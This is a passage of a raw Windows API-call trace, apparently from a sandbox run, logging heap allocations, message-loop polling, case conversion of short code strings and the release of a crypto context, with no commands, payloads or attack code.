wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.672] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.672] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.672] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0209.672] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.673] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0209.673] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.673] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0209.673] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.673] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.673] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.674] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.674] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0209.674] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.675] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0209.675] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0209.675] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.675] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0209.675] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.675] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.675] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0209.676] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.676] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.676] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.676] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.676] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0209.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0209.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.677] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.677] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.677] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.677] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.677] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.677] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.677] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.677] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.677] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.677] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.678] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.678] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.678] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.678] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.678] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.678] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.678] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.678] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.678] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.678] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.678] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.678] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.678] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.679] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.679] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.679] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.679] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.679] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.679] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.679] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.679] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.679] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.679] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.679] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.679] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.680] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.680] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.680] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.680] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.680] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.680] CryptReleaseContext (hProv=0xad27a8, dwFlags=0x0) returned 1 [0209.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.682] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.683] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.684] FreeLibrary (hLibModule=0x74d40000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.684] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.684] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.684] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.685] HeapFree (in: 